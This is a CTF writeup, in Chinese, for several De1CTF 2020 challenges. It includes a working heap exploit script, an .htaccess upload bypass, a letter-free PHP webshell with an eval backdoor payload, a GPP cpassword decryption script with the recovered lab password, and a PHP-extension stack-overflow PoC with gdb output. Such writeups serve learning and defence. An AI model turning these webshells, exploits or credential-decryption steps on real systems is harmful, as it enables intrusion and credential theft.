2020-De1ctf-部分WP

May 7, 2020 CTF-Writeup 访问: 57 次


pwn

stl_container

题目是用 C++ STL 写的,了解 STL 容器的实现之后再来看这个题会更容易理解
在Vector类的erase函数中存在UAF漏洞
STL vector 的 erase(); 函数漏洞

我们只需要搞清楚 malloc/free 的位置,先把 tcache 填满,利用 UAF 泄露 libc 地址,然后通过 double free 把 __free_hook 改成 one_gadget

exp:

from pwn import *
import sys
context.log_level = 'debug'
debug = 1
file_name = './stl_container'
libc_name = '/lib/x86_64-linux-gnu/libc.so.6'
ip = ''
prot = ''
# Local process while debug is set; the remote branch expects ip/prot to be
# filled in (int('') raises as written).
if debug:
    r = process(file_name)
else:
    r = remote(ip, int(prot))
libc = ELF(libc_name)

file = ELF(file_name)


# Thin I/O helpers over the pwntools tube.
def sl(x):
    return r.sendline(x)


def sd(x):
    return r.send(x)


def sla(x, y):
    return r.sendlineafter(x, y)


def rud(x):
    return r.recvuntil(x, drop=True)


def ru(x):
    return r.recvuntil(x)


def li(name, x):
    return log.info(name + ':' + hex(x))


def ri():
    return r.interactive()


# Sub-menu of every container: 1 = add, 2 = delete, 3 = show
def mlist(chose,index,value):
    """Drive container 1 (list): chose 1 adds `value`, any other choice acts on `index`."""
    ru(">> ")
    sl("1")
    ru(">> ")
    sl(str(chose))
    if chose == 1:
        ru("input data:")
        sd(value)
    else:
        # delete (2) and show (3) both prompt for an index
        ru("index?")
        sl(str(index))

def mvector(chose,index,value):
    """Drive container 2 (vector): chose 1 adds `value`, any other choice acts on `index`."""
    ru(">> ")
    sl("2")
    ru(">> ")
    sl(str(chose))
    if chose == 1:
        ru("input data:")
        sd(value)
    else:
        # delete (2) and show (3) both prompt for an index
        ru("index?")
        sl(str(index))

def mqueue(chose,index,value):
    """Drive container 3 (queue): 1 adds `value`, 2 pops without an index, 3 shows `index`."""
    ru(">> ")
    sl("3")
    ru(">> ")
    sl(str(chose))
    if chose == 1:
        ru("input data:")
        sd(value)
    elif chose != 2:
        ru("index?")
        sl(str(index))

def mstack(chose,index,value):
    """Drive container 4 (stack): 1 adds `value`, 2 pops without an index, 3 shows `index`."""
    ru(">> ")
    sl("4")
    ru(">> ")
    sl(str(chose))
    if chose == 1:
        ru("input data:")
        sd(value)
    elif chose != 2:
        ru("index?")
        sl(str(index))


def debug():
    """Attach gdb to the running target; the call site below is left commented out."""
    target = r
    gdb.attach(target)

# for x in range(2):
#     mvector(1,0,"aaaa")
#     mqueue(1,0,"aaaa")
#     mstack(1,0,"aaaa")
#     mlist(1,0,"aaaa")

# mqueue(2)
# Stage 1 (the writeup's plan: fill tcache, leak via UAF, double free):
# add two entries to each container.
mlist(1,0,"bbbb")
mvector(1,0,"aaaa")
mqueue(1,0,"aaaa")
mstack(1,0,"aaaa")

mlist(1,0,"bbbb")
mvector(1,0,"aaaa")
mqueue(1,0,"aaaa")
mstack(1,0,"aaaa")


# Stage 2: delete both list, queue and stack entries, then one vector entry.
mlist(2,0,"test_2")
mlist(2,0,"test_2")

mqueue(2,0,"test_2")
mqueue(2,0,"test_2")

mstack(2,0,"test_2")
mstack(2,0,"test_2")


mvector(2,0,"test_2")

# Stage 3: "show" on the vector still reads the erased element (the erase()
# UAF the writeup names), so the freed chunk's contents - presumably a libc
# pointer left by the allocator - come back. 0x3ebca0 is that pointer's
# distance from libc base on the challenge's libc (page value). The root fix
# is in the container's erase path (not shown): never keep a stale reference.
mvector(3,0,"test_2")#show
ru("data: ")
libc_base = u64(rud("\x0a").ljust(8,"\x00"))-0x3ebca0
li("libc_base",libc_base)
free_hook =  libc.symbols['__free_hook'] + libc_base
li("free_hook",free_hook)
# one_gadget candidates for this libc (page values); the second one is used.
one_gg = [0x4f2c5,0x4f322,0x10a38c]
one = one_gg[1]+libc_base

# Stage 4: re-add entries, then delete the same vector entry twice (double free).
mlist(1,0,"bbbb")
mlist(1,0,"bbbb")


mvector(1,0,"aaaa")

mvector(2,0,"test_2")
mvector(2,0,"test_2")

# Stage 5: the next allocations are served from the double-freed chunk; per
# the writeup they end up pointing __free_hook at the one-gadget (the exact
# allocation order depends on the containers' internals, not visible here).
# A glibc with tcache double-free detection (2.29+) would abort at stage 4.
mqueue(1,0,p64(free_hook))
mqueue(1,0,p64(one))

# debug()
ri()

web

check in

打开页面发现是文件上传,经过测试发现,不能上传php后缀的文件,文件内容也不能带有php字符串,于是尝试上传.htaccess,但是其内容同样需要绕过对php字符串的过滤

AddType application/x-httpd-p\
hp .radish

YeiHtU.png

YeijXR.png

YeFCtO.png

index.php

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Cheek in</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" type="text/css" href="style/css/style1.css">
    <link rel="stylesheet" type="text/css" href="style/css/style2.css">
</head>
<?php
// Upload handler of the "check in" challenge. Every check below is either a
// blacklist or trusts client-supplied metadata, which is why the writeup's
// .htaccess upload gets through. The usual fixes: an allowlist of extensions,
// a server-generated filename, and storage outside the document root.
error_reporting(0);

// Per-client directory; md5 of the client IP is predictable, so the uploader
// knows the path (it is also echoed back below).
$userdir = "uploads/" . md5($_SERVER["REMOTE_ADDR"]);
$typeAccepted = ["image/jpeg", "image/gif", "image/png"];
if (!file_exists($userdir)) {
    mkdir($userdir, 0777, true);  // world-writable directory inside the web root
}
if (isset($_POST["upload"])) {
    $tmp_name = $_FILES["fileUpload"]["tmp_name"];
    $name = $_FILES["fileUpload"]["name"];
    $black = file_get_contents($tmp_name);
    if (!$tmp_name) {
        $result1 ="???";
    }else if (!$name) {
        $result1 ="filename cannot be empty!";
    }
    // Substring blacklist on the client-chosen filename; ".htaccess" contains
    // none of these substrings, so it is accepted.
    else if (preg_match("/ph|ml|js|cg/i", $name)) {
        $result1 = "filename error";
    }
    // $_FILES[...]['type'] is the Content-Type the client sent, not the file's
    // real type, so this check is satisfied by anyone who sets the header.
    else if (!in_array($_FILES["fileUpload"]['type'], $typeAccepted)) {
        $result1 = 'filetype error';
    }
    // Keyword blacklist on the raw body; a backslash line continuation in an
    // Apache directive (as in the writeup) splits "php" across lines and passes.
    else if (preg_match("/perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet/i",$black)){
        $result1 = "perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet in contents!";
    }
    else {
        // Stored under the original name inside the web root, so an uploaded
        // .htaccess changes how Apache serves the whole directory.
        $upload_file_path = $userdir . "/" . $name;
        move_uploaded_file($tmp_name, $upload_file_path);
        // Shell string; $userdir is an md5 so not injectable here, but marking
        // every upload executable is unnecessary.
        system("chmod +x ".$userdir."/*");
        $result2= "Your dir : " . $userdir. ' <br>';
        $result3= "Your files :" .$name.'<br>';  // client-chosen $name is later printed unescaped
    }

}else{
    $result1 = 'upload your file';
}
?>
<body>
<div class="wrap">
    <div class="container">
        <h1 style="color: white; margin: 0; text-align: center">UPLOADS</h1>
        <form action="index.php" method="post" enctype="multipart/form-data">
        <input class="wd" type="file" name="fileUpload" id="file"><br>
        <input class="wd" type="submit" name="upload" value="submit">
            <p class="change_link" style="text-align: center">
            <strong><?php print_r($result1);?></strong>
            </br>
            <strong><?php print_r($result3);?></strong>
            </br>
            <strong><?php print_r($result2);?></strong>
            </p>
        </form>
    </div>
</div>
</body>
</html>

Hard_Pentest 1

题目给了源码

<?php
//Clear the uploads directory every hour
// Upload handler of the Hard_Pentest challenge. Check() is a pair of
// blacklists (one extension, one character class for the body); the writeup's
// non-alphanumeric PHP file satisfies both. Allowlisting extensions, naming the
// file server-side and keeping the upload directory non-executable would
// close this.
highlight_file(__FILE__);
// Per-client sandbox: md5 of a fixed salt plus the client IP, so the path is
// predictable for the uploader (it is also echoed below).
$sandbox = "uploads/". md5("De1CTF2020".$_SERVER['REMOTE_ADDR']);
@mkdir($sandbox);
@chdir($sandbox);

if($_POST["submit"]){
    if (($_FILES["file"]["size"] < 2048) && Check()){
        if ($_FILES["file"]["error"] > 0){
            die($_FILES["file"]["error"]);
        }
        else{
            // Client-chosen name (prefixed with md5(ip)), saved relative to the
            // chdir() above, i.e. inside the served uploads tree.
            $filename=md5($_SERVER['REMOTE_ADDR'])."_".$_FILES["file"]["name"];
            move_uploaded_file($_FILES["file"]["tmp_name"], $filename);
            echo "save in:" . $sandbox."/" . $filename;
        }
    }
    else{
        echo "Not Allow!";
    }
}

// Returns true when the upload passes all three blacklist checks.
function Check(){
    $BlackExts = array("php");
    // Only the last dot-separated component is compared, and in_array() is
    // case-sensitive for strings: "php" is rejected, "PHP" is not (whether the
    // server would execute it depends on its handler mapping).
    $ext = explode(".", $_FILES["file"]["name"]);
    $exts = trim(end($ext));
    $file_content = file_get_contents($_FILES["file"]["tmp_name"]);

    // Body may contain no letters (/i covers A-Z), digits, or ;~^`&|. The
    // remaining punctuation is still enough to write executable PHP, so this
    // is not a content control. Only ".." is rejected in the name; other path
    // separators are not normalised (basename() would be the simple fix).
    if(!preg_match('/[a-z0-9;~^`&|]/is',$file_content)  && 
        !in_array($exts, $BlackExts) && 
        !preg_match('/\.\./',$_FILES["file"]["name"])) {
          return true;
    }
    return false;
}
?>

限制文件名不能含有 ..,并且上传的文件内容不能含有字母、数字(以及 ;~^`&| 这几个字符)

这里用到了无字母数字WebShell

webshell:

<?=$_=[]?><?=$_=@"$_"?><?=$_=$_['!'=='@']?><?=$___=$_?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?= $___.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?=$____='_'?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$_=$$____?><?=$_[__]($_[_])?>

payload:

__=system&_=echo ^<?php eval($_REQUEST[a]); > a.php

蚁剑连上去,发现是windows,发现一个flag1_and_flag2hint.zip,但是有密码

查看用户发现有HintZip_Pass

C:\web\uploads\4d0713040392b6d22420537aeee44b29> net user /domain
The request will be processed at a domain controller for domain De1CTF2020.lab.
User accounts for \\dc.De1CTF2020.lab
-------------------------------------------------------------------------------
Administrator            De1ta                    Guest                    
HintZip_Pass             krbtgt                   web                      
The command completed successfully.

参考域渗透——利用SYSVOL还原组策略中保存的密码,来获取HintZip_Pass用户的密码

C:\web\uploads\4d0713040392b6d22420537aeee44b29> dir /s /a \\192.168.0.12\SYSVOL\*.xml
 Volume in drive \\192.168.0.12\SYSVOL has no label.
 Volume Serial Number is 30B1-A1C0
 Directory of \\192.168.0.12\SYSVOL\De1CTF2020.lab\Policies\{B1248E1E-B97D-4C41-8EA4-1F2600F9264B}\Machine\Preferences\Groups
04/15/2020  10:43 PM               478 Groups.xml
               1 File(s)            478 bytes
     Total Files Listed:
               1 File(s)            478 bytes
               0 Dir(s)  29,754,101,760 bytes free

C:\web\uploads\4d0713040392b6d22420537aeee44b29> type \\192.168.0.12\SYSVOL\De1CTF2020.lab\Policies\{B1248E1E-B97D-4C41-8EA4-1F2600F9264B}\Machine\Preferences\Groups\Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="HintZip_Pass" image="2" changed="2020-04-15 14:43:23" uid="{D33537C1-0BDB-44B7-8628-A6030A298430}"><Properties action="U" newName="" fullName="" description="" cpassword="uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08" changeLogon="1" noChange="0" neverExpires="0" acctDisabled="0" userName="HintZip_Pass"/></User>
</Groups>

dec.ps1

# Decrypts a Group Policy Preferences "cpassword" attribute. Those values are
# AES-encrypted with a single static key that Microsoft itself published, so
# anyone who can read SYSVOL (every domain user by default) recovers the
# plaintext. Defender's side: remove GPP items that still carry cpassword,
# rotate the affected accounts, and audit SYSVOL for XML preference files
# that contain the attribute.
function Get-DecryptedCpassword {
    [CmdletBinding()]
    Param (
        [string] $Cpassword 
    )

    try {
        #Append appropriate padding based on string length  
        # (the stored value apparently has its Base64 '=' padding stripped;
        # a length of 4k+1 cannot be valid Base64, so one character is dropped)
        $Mod = ($Cpassword.length % 4)

        switch ($Mod) {
        '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
        '2' {$Cpassword += ('=' * (4 - $Mod))}
        '3' {$Cpassword += ('=' * (4 - $Mod))}
        }

        $Base64Decoded = [Convert]::FromBase64String($Cpassword)

        #Create a new AES .NET Crypto Object
        $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
        # The published static GPP key (not a secret): the same 32 bytes decrypt
        # every cpassword in every domain.
        [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                             0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)

        #Set IV to all nulls to prevent dynamic generation of IV value
        $AesIV = New-Object Byte[]($AesObject.IV.Length) 
        $AesObject.IV = $AesIV
        $AesObject.Key = $AesKey
        $DecryptorObject = $AesObject.CreateDecryptor() 
        [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)

        # The plaintext is UTF-16LE (System.Text.Encoding.Unicode).
        return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
    } 

    catch {Write-Error $Error[0]}
}  
# The cpassword taken from the Groups.xml shown above (HintZip_Pass account).
Get-DecryptedCpassword "uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08"

powershell运行即可得到密码

C:\web\uploads\4d0713040392b6d22420537aeee44b29> powershell -executionpolicy bypass -file test.ps1
zL1PpP@sSwO3d

解压得到flag1

mixture

这道题蛮有意思的,第一次做这个web pwn

admin登录进去发现select.php的功能是任意文件包含,我们把web源码down下来之后审计发现select.php引入了一个Minclude,猜测是自定义的一个php扩展库

<?php
include "profile.php";
// Raw request value; the only later check is !empty() before it reaches a
// native file-reading function.
$search = $_POST['search'];

if($_SESSION['admin']==1){
    print <<<EOT
<form class="form" action="select.php" method="post">
    <div class="form-group">
        <label for="disabledTextInput">You can search anything here!!</label></br>
        <input type="text" name="search" id="fromgo" class="form-control">
    </div>
    </div>
    <div class="form-group">
        <input type="submit" name="submit" class="btn btn-info btn-md" value="submit">
    </div>
</form>
EOT;
}
else{
    print <<<EOT
  <div class="container"> 
    <div class="row"  >           
            <div class="col-md-10 col-md-offset-4">             
                <div class="input-group" display:block;margin:0 auto;>                                                   
                            <button class="btn btn-info btn-search " type="button" >You are not admin or not enough money!</button>
                             </span>

                </div><!-- /input-group -->             
            </div><!-- /.col-lg-6 --> 
    </div>
  </div>
EOT;
}
// A request-controlled string is handed to the native extension. The writeup
// shows Minclude() opens and echoes whatever path it gets (php.ini, the .so
// itself, /proc/self/maps) and copies the argument into a fixed stack buffer
// without a length check, so this line is both an arbitrary file read and the
// entry to a stack overflow. Constrain the value (an allowlist, or realpath()
// under a fixed directory) and bound the copy in the extension. Note that
// urldecode() decodes a second time on already-decoded POST data.
if($_SESSION['admin']==1&&!empty($search)){
    //var_dump(urldecode($search));
    Minclude(urldecode($search));
    //lookup($search);
}

admin页面是显示了phpinfo,我们可以得到php.ini的路径,将其包含出来

; Local Variables:
; tab-width: 4
; End:
extension=/usr/local/lib/php/extensions/no-debug-non-zts-20170718/Minclude.so

得到Minclude.so自定义库的路径,也将其包含出来,拖到IDA里面发现存在花指令,修复之后

// Decompiled zif_Minclude (PHP 7.2 extension entry point). Risk: the string
// argument is copied into a fixed 0x60-byte stack buffer with no length check
// and no terminator, then used as an unrestricted path that is opened and
// echoed. Fixes: reject or truncate n >= 0x60 (or use the zend_string
// directly), NUL-terminate, restrict the path, and build with
// -fstack-protector (the writeup notes the binary has no canary).
void __fastcall zif_Minclude(zend_execute_data *execute_data, zval *return_value)
{
  zval *v2; // r12
  unsigned __int64 v3; // rsi
  FILE *v4; // rbx
  __int64 v5; // rax
  void *src; // [rsp+0h] [rbp-98h]
  size_t n; // [rsp+8h] [rbp-90h]
  char dest; // [rsp+10h] [rbp-88h]  -- shown as one char; the memset below sizes it at 0x60 bytes
  int v9; // [rsp+70h] [rbp-28h]
  char *v10; // [rsp+74h] [rbp-24h]

  v2 = return_value;
  src = 0LL;
  memset(&dest, 0, 0x60uLL);
  v9 = 0;
  v10 = &dest;
  // "s": src and n are the caller's string and its length, both caller-controlled.
  if ( zend_parse_parameters(execute_data->This.u2.next, "s", &src, &n) != -1 )
  {
    // BUG: n is never compared with the buffer size -> stack overflow
    // (the writeup measures 0x88 bytes from dest to the saved return address).
    memcpy(&dest, src, n);
    // With n >= 0x60 the buffer has no NUL, so "%s" reads past it and prints
    // neighbouring stack bytes (the writeup's stack-pointer leak).
    php_printf("%s", &dest);
    php_printf("<br>", &dest);
    v3 = "rb";
    // The argument is also an unrestricted path: any readable file is echoed.
    v4 = fopen(&dest, "rb");
    if ( v4 )
    {
      // Classic feof() loop: the EOF return of fgetc is printed once at the end.
      while ( !feof(v4) )
      {
        v3 = fgetc(v4);
        php_printf("%c", v3);
      }
      php_printf("\n", v3);
    }
    else
    {
      php_printf("no file\n", "rb");
    }
    // Looks like the expansion of RETURN_STR(zend_strpprintf(0, "True")): the
    // interned-string flag selects IS_STRING (6) vs IS_STRING_EX (0x1406) --
    // confirm against the Zend headers for 7.2.
    v5 = zend_strpprintf(0LL, "True");
    v2->value.lval = v5;
    v2->u1.type_info = (*(v5 + 5) & 2u) < 1 ? 5126 : 6;
  }
}

可以看到memcpy有明显的栈溢出,接下来就是构造ROP,很显然这不能像以往的pwn那样直接获取shell,但是我们可以执行shell命令,把shell反弹到自己的服务器上

调试:
官网给了题目的docker环境,启动了docker之后,在里面安装gdb和pwndbg,程序没有开启canary

创建一个test.php

<?php
// Crash PoC from the writeup: an argument far longer than the extension's
// 0x60-byte stack buffer. Run under gdb it faults at the function's ret with
// the saved return address overwritten by 'a' bytes.
$path = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
Minclude($path);

?>

这肯定是可以溢出的

root@15672d5206a8:/var/www/html# gdb php
GNU gdb (Debian 8.2.1-2+b3) 8.2.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 179 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from php...(no debugging symbols found)...done.
pwndbg> set args -f test.php
pwndbg> r
Starting program: /usr/local/bin/php -f test.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa�'��<br>no file

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7fcc361 in zif_Minclude (execute_data=<optimized out>, return_value=<optimized out>) at /root/php-7.2.26/ext/Minclude/Minclude.c:134
134 /root/php-7.2.26/ext/Minclude/Minclude.c: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────────────────
 RAX  0x1406
 RBX  0x6161616161616161 ('aaaaaaaa')
 RCX  0x0
 RDX  0x4
 RDI  0x7ffff428a000 ◂— 0x600000001
 RSI  0x1
 R8   0x7ffff74348c0 (_IO_stdfile_1_lock) ◂— 0x0
 R9   0x7ffff7fcd021 ◂— 0x62616e6500632500
 R10  0x0
 R11  0x5555559a36b0 (zend_strpprintf) ◂— sub    rsp, 0xd8
 R12  0x6161616161616161 ('aaaaaaaa')
 R13  0x7ffff421c0b0 ◂— 0x0
 R14  0x7ffff421c030 —▸ 0x7ffff427c100 —▸ 0x555555a4377d (execute_ex+19037) ◂— mov    r13, qword ptr [r14 + 8]
 R15  0x7ffff427c100 —▸ 0x555555a4377d (execute_ex+19037) ◂— mov    r13, qword ptr [r14 + 8]
 RBP  0x6161616161616161 ('aaaaaaaa')
 RSP  0x7fffffffaf58 ◂— 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
 RIP  0x7ffff7fcc361 (zif_Minclude+321) ◂— ret
───────────────────────────────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────────────────────────────────
 ► 0x7ffff7fcc361 <zif_Minclude+321>    ret    <0x6161616161616161>










───────────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────────────
00:0000│ rsp  0x7fffffffaf58 ◂— 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
... ↓
─────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────
 ► f 0     7ffff7fcc361 zif_Minclude+321
   f 1 6161616161616161
   f 2 6161616161616161
   f 3 6161616161616161
   f 4 6161616161616161
   f 5 6161616161616161
   f 6 6161616161616161
   f 7 6161616161616161
   f 8 6161616161616161
   f 9 6161616161616161
   f 10 6161616161616161
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>

可以看到程序流已经被成功地劫持了,在/root/php-7.2.26/ext/Minclude/Minclude.c:95下断点

pwndbg> b /root/php-7.2.26/ext/Minclude/Minclude.c:95
Breakpoint 1 at 0x7ffff7fcc270: file /root/php-7.2.26/ext/Minclude/Minclude.c, line 98.
pwndbg> r
Starting program: /usr/local/bin/php -f test.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, zif_Minclude (execute_data=0x7ffff421c0b0, return_value=0x7fffffffafb0) at /root/php-7.2.26/ext/Minclude/Minclude.c:98
98  /root/php-7.2.26/ext/Minclude/Minclude.c: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────────────────
 RAX  0x7fffffffaed0 ◂— 0x0
 RBX  0x7fffffffaed0 ◂— 0x0
 RCX  0x0
 RDX  0x5555562f6120 ◂— 0x10000000001
 RDI  0x7fffffffaf30 ◂— 0xffffaed000000000
 RSI  0x7fffffffafb0 —▸ 0x5555562b78b0 (executor_globals+304) ◂— 0x800700000001
 R8   0x7ffff421c0b0 ◂— 0x0
 R9   0x555556303880 ◂— 0x0
 R10  0x0
 R11  0x206
 R12  0x7fffffffafb0 —▸ 0x5555562b78b0 (executor_globals+304) ◂— 0x800700000001
 R13  0x7ffff421c0b0 ◂— 0x0
 R14  0x7ffff421c030 —▸ 0x7ffff427c100 —▸ 0x555555a4377d (execute_ex+19037) ◂— mov    r13, qword ptr [r14 + 8]
 R15  0x7ffff427c100 —▸ 0x555555a4377d (execute_ex+19037) ◂— mov    r13, qword ptr [r14 + 8]
 RBP  0x5555562f6120 ◂— 0x10000000001
 RSP  0x7fffffffaec0 ◂— 0x0
 RIP  0x7ffff7fcc270 (zif_Minclude+80) ◂— mov    edi, dword ptr [r8 + 0x2c]
───────────────────────────────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────────────────────────────────
 ► 0x7ffff7fcc270 <zif_Minclude+80>     mov    edi, dword ptr [r8 + 0x2c]
   0x7ffff7fcc274 <zif_Minclude+84>     lea    rcx, [rsp + 8]
   0x7ffff7fcc279 <zif_Minclude+89>     mov    rdx, rsp
   0x7ffff7fcc27c <zif_Minclude+92>     lea    rsi, [rip + 0xd87]
   0x7ffff7fcc283 <zif_Minclude+99>     call   zend_parse_parameters@plt <0x7ffff7fcc030>

   0x7ffff7fcc288 <zif_Minclude+104>    cmp    eax, -1
   0x7ffff7fcc28b <zif_Minclude+107>    je     zif_Minclude+313 <0x7ffff7fcc359>

   0x7ffff7fcc291 <zif_Minclude+113>    mov    rdx, qword ptr [rsp + 8]
   0x7ffff7fcc296 <zif_Minclude+118>    mov    rsi, qword ptr [rsp]
   0x7ffff7fcc29a <zif_Minclude+122>    mov    rdi, rbx
   0x7ffff7fcc29d <zif_Minclude+125>    call   memcpy@plt <0x7ffff7fcc080>
───────────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────────────
00:0000│ rsp      0x7fffffffaec0 ◂— 0x0
01:0008│          0x7fffffffaec8 —▸ 0x5555559d2f4c ◂— test   eax, eax
02:0010│ rax rbx  0x7fffffffaed0 ◂— 0x0
... ↓
─────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────
 ► f 0     7ffff7fcc270 zif_Minclude+80
   f 1     555555a437ae execute_ex+19086
   f 2     555555a46d28 zend_execute+296
   f 3     5555559a4583 zend_execute_scripts+195
   f 4     555555941b78 php_execute_script+744
   f 5     555555a4925e
   f 6     5555556c72bc
   f 7     7ffff729b09b __libc_start_main+235
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>
0x00007ffff7fcc283  98  in /root/php-7.2.26/ext/Minclude/Minclude.c
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────────────────
 RAX  0x7fffffffaed0 ◂— 0x0
 RBX  0x7fffffffaed0 ◂— 0x0
 RCX  0x7fffffffaec8 —▸ 0x5555559d2f4c ◂— test   eax, eax
 RDX  0x7fffffffaec0 ◂— 0x0
 RDI  0x1
 RSI  0x7ffff7fcd00a ◂— 0x72003e72623c0073 /* 's' */
 R8   0x7ffff421c0b0 ◂— 0x0
 R9   0x555556303880 ◂— 0x0
 R10  0x0
 R11  0x206
 R12  0x7fffffffafb0 —▸ 0x5555562b78b0 (executor_globals+304) ◂— 0x800700000001
 R13  0x7ffff421c0b0 ◂— 0x0
 R14  0x7ffff421c030 —▸ 0x7ffff427c100 —▸ 0x555555a4377d (execute_ex+19037) ◂— mov    r13, qword ptr [r14 + 8]
 R15  0x7ffff427c100 —▸ 0x555555a4377d (execute_ex+19037) ◂— mov    r13, qword ptr [r14 + 8]
 RBP  0x5555562f6120 ◂— 0x10000000001
 RSP  0x7fffffffaec0 ◂— 0x0
 RIP  0x7ffff7fcc283 (zif_Minclude+99) ◂— call   0x7ffff7fcc030
───────────────────────────────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────────────────────────────────
